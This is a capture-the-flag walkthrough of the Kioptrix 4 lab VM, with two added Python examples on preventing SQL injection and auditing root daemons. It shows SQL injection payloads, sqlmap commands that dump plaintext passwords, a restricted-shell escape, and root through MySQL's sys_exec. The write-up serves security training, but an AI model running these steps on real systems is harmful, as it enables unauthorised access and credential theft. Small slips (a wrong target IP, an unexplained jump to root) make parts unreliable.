This is the final box of the Kioptrix series. The last three boxes were simple and nice, but this one is a little harder than the older ones. OK, talk is cheap.
Start by scanning my network with netdiscover.
┌─[[email protected]]─[~/Desktop]
└──> netdiscover

 Currently scanning: 192.168.20.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
 192.168.1.70    08:00:27:c8:67:ee      1      60  PCS Systemtechnik GmbH
 192.168.1.100   34:97:f6:c3:0b:66      1      60  ASUSTek COMPUTER INC.
Target IP is 192.168.1.1. As usual, scan the target with nmap using version detection.
┌─[✗]─[[email protected]]─[~/Desktop]
└──> nmap -sV 192.168.1.70

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 09:33 +0630
Nmap scan report for 192.168.1.70
Host is up (0.00024s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:C8:67:EE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds
Let me check HTTP first and brute-force directories with dirb.
┌─[✗]─[[email protected]]─[~/Desktop]
└──> dirb http://192.168.1.70 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jan  8 09:34:46 2018
URL_BASE: http://192.168.1.70/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.70/ ----
+ http://192.168.1.70/cgi-bin/ (CODE:403|SIZE:327)
==> DIRECTORY: http://192.168.1.70/images/
+ http://192.168.1.70/index (CODE:200|SIZE:1255)
+ http://192.168.1.70/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.70/john/
+ http://192.168.1.70/logout (CODE:302|SIZE:0)
+ http://192.168.1.70/member (CODE:302|SIZE:220)
+ http://192.168.1.70/server-status (CODE:403|SIZE:332)

-----------------
END_TIME: Mon Jan  8 09:34:48 2018
DOWNLOADED: 4612 - FOUND: 6
I found the login page and tried an SQL login bypass.
Username admin and password ' (a single quote): it shows an SQL error, so I know the login is vulnerable to SQL injection.
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Wrong Username or Password
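As an added illustration (not code from this write-up or from the Kioptrix VM), here is the login-check pattern that produces a `mysql_num_rows()` warning like the one above, reproduced in Python against an in-memory SQLite table laid out like the page's `members` table, beside a parameterised version. The sample rows, the `login_vulnerable`/`login_safe` names and the three-way result are my own; the tautology payload uses SQLite's `--` comment where the page's MySQL payload uses `#`.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture: same layout as the page's members table (id, username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [(1, "john", "constructed-pw-john"), (2, "robert", "constructed-pw-robert")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Builds the statement by string concatenation, like the checklogin.php pattern.

    Returns one of three observable states: 'ok', 'denied' or 'sql_error'. The
    third state is what the mysql_num_rows() warning on the page leaks, and the
    difference between 'ok' and 'denied' is what boolean-based blind injection
    (the technique sqlmap reports on this box) keys on.
    """
    sql = ("SELECT id FROM members WHERE username='" + username
           + "' AND password='" + password + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        # A lone quote leaves the statement unterminated: the page's error case.
        return "sql_error"
    return "ok" if rows else "denied"


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Same check with bound parameters: the input is only ever compared as a value."""
    sql = "SELECT id FROM members WHERE username=? AND password=?"
    rows = conn.execute(sql, (username, password)).fetchall()
    return "ok" if rows else "denied"


if __name__ == "__main__":
    db = make_db()
    for pw in ["'", "x' OR 1=1 -- ", "constructed-pw-john"]:
        print(repr(pw), login_vulnerable(db, "john", pw), login_safe(db, "john", pw))
```

The safe version collapses the three states to two (`ok` or `denied`) and makes the tautology fail, which removes both the error leak and the boolean oracle. Storing passwords hashed and connecting with a least-privileged database account are separate fixes that this example does not cover.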
Now open sqlmap and pull all the data from the database:
┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:39:48

[09:39:50] [INFO] resuming back-end DBMS 'mysql'
[09:39:50] [INFO] testing connection to the target URL
[09:39:50] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:39:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:39:50] [INFO] fetching current database
[09:39:50] [INFO] resumed: members
current database: 'members'
[09:39:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:39:50
Pull the tables from the members database:
┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --tables -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:40:40

[09:40:40] [INFO] resuming back-end DBMS 'mysql'
[09:40:40] [INFO] testing connection to the target URL
[09:40:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:40:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:40:40] [INFO] fetching tables for database: 'members'
[09:40:40] [INFO] fetching number of tables for database 'members'
[09:40:40] [INFO] resumed: 1
[09:40:40] [INFO] resumed: members
Database: members
[1 table]
+---------+
| members |
+---------+

[09:40:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:40:40
Pull the columns from the members table:
┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --columns -T members -D members
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:41:41

[09:41:42] [INFO] resuming back-end DBMS 'mysql'
[09:41:42] [INFO] testing connection to the target URL
[09:41:42] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:41:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:41:42] [INFO] fetching columns for table 'members' in database 'members'
[09:41:42] [INFO] resumed: 3
[09:41:42] [INFO] resumed: id
[09:41:42] [INFO] resumed: int(4)
[09:41:42] [INFO] resumed: username
[09:41:42] [INFO] resumed: varchar(65)
[09:41:42] [INFO] resumed: password
[09:41:42] [INFO] resumed: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

[09:41:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:41:42
Finally, dump the data from those columns:
┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --dump -C username,password -T members -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:24

[09:42:24] [INFO] resuming back-end DBMS 'mysql'
[09:42:24] [INFO] testing connection to the target URL
[09:42:24] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:42:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:24] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members'
[09:42:24] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members'
[09:42:24] [INFO] resumed: 2
[09:42:24] [INFO] resumed: ADGAdsafdfwt4gadfga==
[09:42:24] [INFO] resumed: robert
[09:42:24] [INFO] resumed: MyNameIsJohn
[09:42:24] [INFO] resumed: john
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+
We already noticed that SSH is open, so try to log in with this info. Remember to try every password you recovered, to get to the flag faster.
└──> ssh robert@192.168.1.70
robert@192.168.1.70's password:
Permission denied, please try again.
robert@192.168.1.70's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ls -al
total 24
drwxr-xr-x 2 robert robert 4096 2012-02-04 18:53 .
drwxr-xr-x 5 root   root   4096 2012-02-04 18:05 ..
-rw-r--r-- 1 robert robert  220 2012-02-04 18:05 .bash_logout
-rw-r--r-- 1 robert robert 2940 2012-02-04 18:05 .bashrc
-rw-r--r-- 1 robert robert    5 2012-02-04 18:59 .lhistory
-rw-r--r-- 1 robert robert  586 2012-02-04 18:05 .profile
robert:~$ cat /etc/passwd
*** unknown command: cat
robert:~$
Login succeeded, but the restricted shell is not usable, so I tried to break out of it with echo os.system('/bin/bash').
robert:~$ echo os.system('/bin/bash')
robert@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
Yes, it works. Awesome 😉. Then a small fix so the terminal behaves properly.
robert@Kioptrix4:/$ clear
'xterm-256color': unknown terminal type.
robert@Kioptrix4:/$ export TERM=xterm
robert@Kioptrix4:/var/www$ ls -al
total 44
drwxr-xr-x  5 root root 4096 2018-01-07 21:55 .
drwxr-xr-x 14 root root 4096 2012-02-04 09:57 ..
-rw-r--r--  1 root root 1477 2012-02-06 11:31 checklogin.php
-rw-r--r--  1 root root  298 2012-02-04 11:11 database.sql
drwxr-xr-x  2 root root 4096 2012-02-06 11:44 images
-rw-r--r--  1 root root 1255 2012-02-06 12:07 index.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:33 john
-rw-r--r--  1 root root  176 2012-02-04 12:39 login_success.php
-rw-r--r--  1 root root   78 2012-02-04 11:33 logout.php
-rw-r--r--  1 root root  606 2012-02-06 15:42 member.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:30 robert
robert@Kioptrix4:/var/www$ cat checklogin.php | head -n 6
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
Now I know the MySQL root password is empty. At this point I tried to root the box through a kernel exploit, but gcc is not installed, so let's try another method: I looked for processes running as root.
robert@Kioptrix4:/var/www$ ps -ef | grep root
root         1     0  0 21:58 ?        00:00:00 /sbin/init
root         2     0  0 21:58 ?        00:00:00 [kthreadd]
root         3     2  0 21:58 ?        00:00:00 [migration/0]
root         4     2  0 21:58 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 21:58 ?        00:00:00 [watchdog/0]
root         6     2  0 21:58 ?        00:00:00 [events/0]
root         7     2  0 21:58 ?        00:00:00 [khelper]
root        41     2  0 21:58 ?        00:00:00 [kblockd/0]
root        44     2  0 21:58 ?        00:00:00 [kacpid]
root        45     2  0 21:58 ?        00:00:00 [kacpi_notify]
root        90     2  0 21:58 ?        00:00:00 [kseriod]
root       129     2  0 21:58 ?        00:00:00 [pdflush]
root       130     2  0 21:58 ?        00:00:00 [pdflush]
root       131     2  0 21:58 ?        00:00:00 [kswapd0]
root       173     2  0 21:58 ?        00:00:00 [aio/0]
root      1265     2  0 21:58 ?        00:00:00 [ata/0]
root      1268     2  0 21:58 ?        00:00:00 [ata_aux]
root      1277     2  0 21:58 ?        00:00:00 [scsi_eh_0]
root      1280     2  0 21:58 ?        00:00:00 [scsi_eh_1]
root      1299     2  0 21:58 ?        00:00:00 [ksuspend_usbd]
root      1306     2  0 21:58 ?        00:00:00 [khubd]
root      2026     2  0 21:58 ?        00:00:00 [scsi_eh_2]
root      2238     2  0 21:58 ?        00:00:00 [kjournald]
root      2405     1  0 21:58 ?        00:00:00 /sbin/udevd --daemon
root      2654     2  0 21:58 ?        00:00:00 [kpsmoused]
root      3927     1  0 21:58 tty4     00:00:00 /sbin/getty 38400 tty4
root      3928     1  0 21:58 tty5     00:00:00 /sbin/getty 38400 tty5
root      3932     1  0 21:58 tty2     00:00:00 /sbin/getty 38400 tty2
root      3934     1  0 21:58 tty3     00:00:00 /sbin/getty 38400 tty3
root      3937     1  0 21:58 tty6     00:00:00 /sbin/getty 38400 tty6
root      3995     1  0 21:58 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4016     1  0 21:58 ?        00:00:00 /usr/sbin/sshd
root      4072     1  0 21:58 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -
root      4116  4072  0 21:58 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4189     1  0 21:58 ?        00:00:00 /usr/sbin/nmbd -D
root      4191     1  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4205  4191  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4206     1  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4219  4206  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4238     1  0 21:58 ?        00:00:00 /usr/sbin/cron
root      4260     1  0 21:58 ?        00:00:00 /usr/sbin/apache2 -k start
root      4317     1  0 21:58 tty1     00:00:00 /sbin/getty 38400 tty1
root      4390  4016  0 22:22 ?        00:00:00 sshd: robert [priv]
robert    4445  4395  0 22:29 pts/0    00:00:00 grep root
Yes, I found that MySQL is running as root:
root 4114 4072 0 21:58 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -
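Grepping for "root" works, but it means eyeballing a long listing in which most root entries (kernel threads, init, getty, sshd) are normal. As an added example, not from the write-up, here is a small Python audit over `ps -ef` text that flags daemons running as root when a service account is expected, and any command line started with `--user=root`. The `SAMPLE_PS` lines are constructed from the page's listing plus two invented rows (a `www-data` Apache worker and a correctly configured `mysqld`) to show the non-finding case; the `EXPECTED_USER` map is an assumption for the example, not a property of any distribution.

```python
import re

# Constructed sample: a subset of the page's listing plus two invented rows
# (the www-data apache2 worker and the mysqld running as 'mysql').
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 21:58 ?        00:00:00 /sbin/init
root         2     0  0 21:58 ?        00:00:00 [kthreadd]
root      4016     1  0 21:58 ?        00:00:00 /usr/sbin/sshd
root      4072     1  0 21:58 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root
root      4260     1  0 21:58 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4270  4260  0 21:58 ?        00:00:00 /usr/sbin/apache2 -k start
mysql     9999     1  0 21:58 ?        00:00:00 /usr/sbin/mysqld --user=mysql
"""

# Assumption for the example: daemons that should run under a service account.
EXPECTED_USER = {"mysqld": "mysql"}


def parse_ps(text):
    """Parse `ps -ef` output into dicts; the CMD field keeps its embedded spaces."""
    procs = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 7)             # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8:
            continue
        uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
        procs.append({"user": uid, "pid": int(pid), "ppid": int(ppid), "cmd": cmd})
    return procs


def audit_root_daemons(text):
    """Return (pid, exe, reasons) for processes that violate the expected-user policy."""
    findings = []
    for p in parse_ps(text):
        exe = p["cmd"].split()[0].rsplit("/", 1)[-1]
        if exe.startswith("["):                 # kernel thread, always root, skip
            continue
        reasons = []
        expected = EXPECTED_USER.get(exe)
        if expected and p["user"] != expected:
            reasons.append(f"runs as {p['user']}, expected {expected}")
        if re.search(r"--user=root\b", p["cmd"]):
            reasons.append("started with --user=root")
        if reasons:
            findings.append((p["pid"], exe, reasons))
    return findings


if __name__ == "__main__":
    for pid, exe, reasons in audit_root_daemons(SAMPLE_PS):
        print(pid, exe, "; ".join(reasons))
```

On a live host, feed it the real output (`ps -ef` read from stdin or a file). The finding here is the one the write-up spotted by hand: pid 4114 is `mysqld` running as root and explicitly started with `--user=root`. The usual fix is to run the server as the dedicated account (`user = mysql` under `[mysqld]` in my.cnf, or `--user=mysql` on the mysqld_safe command line), which is exactly the setting the invented pid 9999 row has.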
OK, try to log in to MySQL.
robert@Kioptrix4:/var/www$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| members            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql>
It works, so I searched Google for how to get root from MySQL, and found a nice trick:
https://thehackernews.com/2016/11/mysql-zero-day-exploits.html
MySQL can also run shell commands through the sys_exec function (a user-defined function from lib_mysqludf_sys, not part of a stock MySQL build; it only works here because it is loaded on this box). Since mysqld runs as root, those commands run as root too, so I tried to give my current account root permission:
select sys_exec('usermod -a -G admin robert');
Got root! Nice trick, and I love rooting boxes. Finally, we need to show the PoC: reading the flag file.
root@Kioptrix4:/var/www# cd /root/
root@Kioptrix4:~# ls -al
total 44
drwxr-xr-x  4 root       root       4096 2012-02-06 18:46 .
drwxr-xr-x 21 root       root       4096 2012-02-06 18:41 ..
-rw-------  1 root       root        254 2018-01-07 21:56 .bash_history
-rw-r--r--  1 root       root       2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 root       root        625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 root       root          1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 root       root          1 2012-02-05 10:38 .mysql_history
-rw-------  1 root       root          5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 root       root        141 2007-10-20 07:51 .profile
drwx------  2 root       root       4096 2012-02-06 11:43 .ssh
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.

Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret
root@Kioptrix4:~#
Thanks for reading. Happy hacking.